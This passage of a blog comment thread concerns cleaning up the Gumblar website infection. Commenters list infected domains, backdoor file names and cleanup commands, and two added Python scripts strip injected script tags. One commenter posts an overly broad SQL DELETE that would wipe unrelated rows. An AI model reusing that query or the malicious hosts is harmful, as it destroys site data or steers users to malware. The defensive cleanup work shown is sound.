      And it is critical to remove the malware that steals passwords. Without it all your efforts are futile.

  22. |

    Thanks for this article – it was really useful to identify what happened to some of my sites.

    I found the infection in 3 areas:
    - on all html pages a script line was placed between the Head and Body tag
    - on all js scripts, a new line was added document.write(”);
    - and on some php files, a new string (just on the top) starting with

    And the classical gifimg.php in all Image folders.

    All linked to hxxp://miamix.extra .hu/ images/ca_fotoalbum.php.

    BTW, I noticed the problem because the RSS feed did not work properly. :-)

  23. |

    hxxp://lakas-elado.extra .hu/ alaprajz/album.php

  24. |

    We have found 2 new backdoor scripts = it looks like they are not just using gifimg.php and image.php anymore:

    beauty-shop-color.php
    VideoPlaylist.php

    just contained the eval backdoor… these files were not found on original backups prior to the attack date of Nov 11 2009

  25. |

    Sorry:

    JS:
    vgallery.extra .hu/ categories/style.php
    case.writeup .co.jp/ images/a5hd/img-osouji.php
    koltaiandor.extra .hu/ portre/nyito_right.php

    HTML:
    koltaiandor.extra .hu/ portre/nyito_right.php

    • |

      Thanks Josh.

      I had to remove the link to your site from your signature since your site is still infected.

      This time link to “uznai-pravdu-ru.1gb .ru/ includes/style.php

      Make sure you followed my removal instructions

  26. |

    A few of my site had this issue just yesterday.

    They are using robots.php as well.

  27. |

    Very interesting article!!
    I’ve one client’s site with this malicious script (the one that ends with billeterie.php) and still can’t clean it out. It’s a pain in the ass!
    And it gets worse, since there isn’t a clean copy of the site, so the only thing to try (keep trying) is manual removal.

    Thanks for taking the time to help us with this helpful guide!

    Regards from argentina.

  28. |

    I faced this issue. The file with the eval code was the index.php of my Joomla default RHUK Milkyway template.
    In addition to this I found that the password of the admin user was changed, together with its email.

    Thanks you very much for this valuable article.
    Best regards from Italy!!!

  29. |

    Hi

    Your blog – report on Gumblar helped me to understand what is going on..

    My site with 1000’s of pages was ruined…

    I have found that they got the FTP and went through one by one putting code into every Joomla site…

    Someone calling himself Alex used the contact form of each one, sending this message

    Very Nice Site ! Is this yours too”

    There seems to have been an intrusion in July and it resumed in late December 23 approx

    Here is the code that they place on every joomla site…

    It shows up in the database in 10 location

    user
    sessionplugin
    modules
    acl ora section
    acl ora groups
    acl ora something else
    contact detail
    components ( 17 locations )
    categories

    Here is the code that they use

    I have been banned from Google News as a result of this..

    I can see no cure as the code is too deep in the database..

    CODE FOLLOWS BEWARE

    SELECT *
    FROM `que0927708391162`.`jos_core_acl_aro_sections`
    WHERE (
    `id` LIKE ‘%”Female%’
    OR `value` LIKE ‘%”Female%’
    OR `order_value` LIKE ‘%”Female%’
    OR `name` LIKE ‘%”Female%’
    OR `hidden` LIKE ‘%”Female%’
    )
    OR (
    `id` LIKE ‘%use%’
    OR `value` LIKE ‘%use%’
    OR `order_value` LIKE ‘%use%’
    OR `name` LIKE ‘%use%’
    OR `hidden` LIKE ‘%use%’
    )
    OR (
    `id` LIKE ‘%of%’
    OR `value` LIKE ‘%of%’
    OR `order_value` LIKE ‘%of%’
    OR `name` LIKE ‘%of%’
    OR `hidden` LIKE ‘%of%’
    )
    OR (
    `id` LIKE ‘%viagra”%’
    OR `value` LIKE ‘%viagra”%’
    OR `order_value` LIKE ‘%viagra”%’
    OR `name` LIKE ‘%viagra”%’
    OR `hidden` LIKE ‘%viagra”%’
    )
    LIMIT 0 , 30

    DELETE FROM `que0927708391162`.`jos_categories` WHERE (`id` LIKE ‘%”Female%’ OR `parent_id` LIKE ‘%”Female%’ OR `title` LIKE ‘%”Female%’ OR `name` LIKE ‘%”Female%’ OR `alias` LIKE ‘%”Female%’ OR `image` LIKE ‘%”Female%’ OR `section` LIKE ‘%”Female%’ OR `image_position` LIKE ‘%”Female%’ OR `description` LIKE ‘%”Female%’ OR `published` LIKE ‘%”Female%’ OR `checked_out` LIKE ‘%”Female%’ OR `checked_out_time` LIKE ‘%”Female%’ OR `editor` LIKE ‘%”Female%’ OR `ordering` LIKE ‘%”Female%’ OR `access` LIKE ‘%”Female%’ OR `count` LIKE ‘%”Female%’ OR `params` LIKE ‘%”Female%’) OR (`id` LIKE ‘%use%’ OR `parent_id` LIKE ‘%use%’ OR `title` LIKE ‘%use%’ OR `name` LIKE ‘%use%’ OR `alias` LIKE ‘%use%’ OR `image` LIKE ‘%use%’ OR `section` LIKE ‘%use%’ OR `image_position` LIKE ‘%use%’ OR `description` LIKE ‘%use%’ OR `published` LIKE ‘%use%’ OR `checked_out` LIKE ‘%use%’ OR `checked_out_time` LIKE ‘%use%’ OR `editor` LIKE ‘%use%’ OR `ordering` LIKE ‘%use%’ OR `access` LIKE ‘%use%’ OR `count` LIKE ‘%use%’ OR `params` LIKE ‘%use%’) OR (`id` LIKE ‘%of%’ OR `parent_id` LIKE ‘%of%’ OR `title` LIKE ‘%of%’ OR `name` LIKE ‘%of%’ OR `alias` LIKE ‘%of%’ OR `image` LIKE ‘%of%’ OR `section` LIKE ‘%of%’ OR `image_position` LIKE ‘%of%’ OR `description` LIKE ‘%of%’ OR `published` LIKE ‘%of%’ OR `checked_out` LIKE ‘%of%’ OR `checked_out_time` LIKE ‘%of%’ OR `editor` LIKE ‘%of%’ OR `ordering` LIKE ‘%of%’ OR `access` LIKE ‘%of%’ OR `count` LIKE ‘%of%’ OR `params` LIKE ‘%of%’) OR (`id` LIKE ‘%viagra”%’ OR `parent_id` LIKE ‘%viagra”%’ OR `title` LIKE ‘%viagra”%’ OR `name` LIKE ‘%viagra”%’ OR `alias` LIKE ‘%viagra”%’ OR `image` LIKE ‘%viagra”%’ OR `section` LIKE ‘%viagra”%’ OR `image_position` LIKE ‘%viagra”%’ OR `description` LIKE ‘%viagra”%’ OR `published` LIKE ‘%viagra”%’ OR `checked_out` LIKE ‘%viagra”%’ OR `checked_out_time` LIKE ‘%viagra”%’ OR `editor` LIKE ‘%viagra”%’ OR `ordering` LIKE ‘%viagra”%’ OR `access` LIKE ‘%viagra”%’ OR `count` LIKE ‘%viagra”%’ OR `params` LIKE ‘%viagra”%’)
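    The following is an added example, not code from the post or from the comment above. It builds a throwaway in-memory SQLite stand-in for a Joomla `jos_categories` table (reduced to id/title/description) with constructed rows, and contrasts the fragment-style search used above (`LIKE '%use%'`, `LIKE '%of%'`) with an exact match on the full injected string, then strips only that string with `replace()` so the rows themselves survive. `SPAM_MARKER` is a placeholder for the injected fragment, not the real one.

```python
import sqlite3

# Placeholder for the injected spam fragment (an assumption, not the real string).
SPAM_MARKER = '<a href="http://spam.invalid/">"Female use of viagra"</a>'

# Constructed sample rows: only row 3 carries the injection, but rows 1, 2 and 4
# contain the ordinary words "of", "use" and "Office" (LIKE is case-insensitive).
ROWS = [
    (1, "News", "Latest news of the club"),
    (2, "Products", "Products we use every day"),
    (3, "About", "Who we are" + SPAM_MARKER),
    (4, "Contact", "Office hours"),
]


def build_db():
    """In-memory stand-in for jos_categories (assumed subset of the Joomla 1.5 schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE jos_categories (id INTEGER PRIMARY KEY, title TEXT, description TEXT)"
    )
    db.executemany("INSERT INTO jos_categories VALUES (?, ?, ?)", ROWS)
    return db


def broad_match_ids(db):
    """Row ids hit by the fragment-style search from the comment: near enough every row."""
    cur = db.execute(
        "SELECT id FROM jos_categories WHERE description LIKE '%use%' OR description LIKE '%of%'"
        " OR description LIKE '%\"Female%' OR description LIKE '%viagra\"%' ORDER BY id"
    )
    return [r[0] for r in cur]


def exact_match_ids(db, marker):
    """Row ids that contain the complete injected fragment (instr() is exact, case-sensitive)."""
    cur = db.execute(
        "SELECT id FROM jos_categories WHERE instr(description, ?) > 0 ORDER BY id", (marker,)
    )
    return [r[0] for r in cur]


def strip_marker(db, marker):
    """Remove only the injected fragment and keep the row; returns the number of rows changed."""
    with db:  # one transaction: rolled back automatically if the UPDATE raises
        cur = db.execute(
            "UPDATE jos_categories SET description = replace(description, ?, '')"
            " WHERE instr(description, ?) > 0",
            (marker, marker),
        )
    return cur.rowcount


def remaining_descriptions(db):
    """Descriptions in id order, to check what survived."""
    return [r[0] for r in db.execute("SELECT description FROM jos_categories ORDER BY id")]


if __name__ == "__main__":
    db = build_db()
    print("broad search would delete rows:", broad_match_ids(db))
    print("exact search finds rows:       ", exact_match_ids(db, SPAM_MARKER))
    print("rows cleaned:", strip_marker(db, SPAM_MARKER))
    print("after cleanup:", remaining_descriptions(db))
```

    MySQL has `INSTR()` and `REPLACE()` under the same names (add `BINARY` if a case-sensitive match is wanted), so the SELECT and UPDATE carry over directly: run the SELECT first, review the ids it returns, and wrap the UPDATE in a transaction.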

  30.

    I had backups of my website which seems to have taken care of the problem, but my own laptop seems to still be compromised and I think I’m going to have to format it – I’ve been using AVG and Malware Bytes over and over and it’s fine until I re-enable the internet connection and promptly something downloads new trojan software and the Google redirects resume. Something, somewhere, is persistent – but what?

  31.

    [...] addressing its Javascript obfuscation, the affected domains and its C&C communication[2][3][4]. However, scarce detail is available about the very vulnerabilities and exploits leveraged by [...]

  32.

    You can use the following tools to remove the injection code:
    Windows – FART
    1. Download from hxxp://sourceforge.net/projects/fart-it/
    2. Run the following command:
    fart -r -i -C --remove C:\path_to_file\* ""

    Linux – sed command
    1. Use the following command:
    sed -i '/injected_code/d' /path/to/file.htm
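    As an added example (not from the comment above or from the post itself): the `sed '/.../d'` form deletes every whole line that contains the pattern, which also takes out any legitimate markup sharing that line, and the post notes the injected tag is usually placed right before `<body>`. The Python below removes only the injected `<script src=http://…/….php ></script>` tag, walks a directory tree, and keeps a `.bak` copy of each changed file as evidence. The regex, file extensions and the sample site it builds in a temporary directory are all constructed for this example; the hostname in the sample is a placeholder. Cleaning files without first removing the backdoor scripts and changing the FTP credentials only invites reinfection.

```python
import os
import re
import shutil
import tempfile

# Matches the injected tag form described in the post (unquoted src, a space before '>'),
# with the host left generic so other injection domains are caught as well; quoted src
# attributes are accepted too. Assumption: only tags whose src ends in .php are targeted.
INJECTED_TAG = re.compile(
    r'<script\s+src=["\']?https?://[^\s"\'>]+\.php["\']?\s*>\s*</script>',
    re.IGNORECASE,
)
TARGET_EXT = (".html", ".htm", ".php")


def clean_text(text):
    """Return (cleaned_text, hits); only the tag is removed, the rest of the line survives."""
    return INJECTED_TAG.subn("", text)


def clean_tree(root, backup=True):
    """Rewrite every target file under root that contains the tag; return {relative_path: hits}."""
    changed = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TARGET_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            cleaned, hits = clean_text(original)
            if hits == 0:
                continue
            if backup:
                shutil.copy2(path, path + ".bak")  # keep the infected copy for forensics
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
            changed[os.path.relpath(path, root)] = hits
    return changed


# Constructed sample page: the tag sits on the same line as <body>, as the post describes.
SAMPLE_INFECTED = (
    "<html><head><title>t</title></head>\n"
    "<script src=http://injected.invalid/autosuggest/bollywoodthisweek.php ></script><body>\n"
    "<p>Real content</p>\n</body></html>\n"
)
SAMPLE_CLEAN = "<html><body><p>Clean page</p></body></html>\n"


def make_sample_tree():
    """Build a throwaway site (constructed data, not a real dump) and return its path."""
    root = tempfile.mkdtemp(prefix="gumblar_demo_")
    os.makedirs(os.path.join(root, "sub"))
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_INFECTED)
    with open(os.path.join(root, "sub", "page.htm"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CLEAN)
    return root


def demo():
    """Clean the sample tree and report what changed, what the page looks like now, and the backup."""
    root = make_sample_tree()
    changed = clean_tree(root)
    with open(os.path.join(root, "index.html"), encoding="utf-8") as fh:
        index_after = fh.read()
    return {
        "changed": changed,
        "index_after": index_after,
        "backup_present": os.path.exists(os.path.join(root, "index.html.bak")),
    }


if __name__ == "__main__":
    print(demo())
```

    Run `clean_tree("/path/to/docroot")` against a copy of the site first and diff a few changed files against their `.bak` twins before touching the live tree; a stray `<script>` that the regex does not match is a sign of a different injection variant, not a clean file.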

  33.

    This is an excellent write up to a topic that most Joomla administrators could not help me with. I am very very grateful!

  34.

    Thank you for the excellent summary… I would like to add that, where possible, an IP whitelist for FTP access seems like it will effectively prevent this (or stop it from happening again once a site is truly clean, no backdoors etc.).

    With a compatible FTP daemon, simply placing one simple .ftpaccess file in the root directory will do the trick:

    <Limit ALL>
    DenyAll
    Allow w.x.y.z
    Allow a.b.c.d
    </Limit>

    Add as many IPs as you need to whitelist, or as few as one.

    In this way, even if the virus has obtained the FTP username and password, it cannot log in unless from an IP on the whitelist.

    I suppose the botnet could learn to spoof IPs, but this is really just a case of making your site NOT be the “low-hanging fruit”.

    Hope that helps someone…

  35.

    [...] How to REMOVE Exploits [...]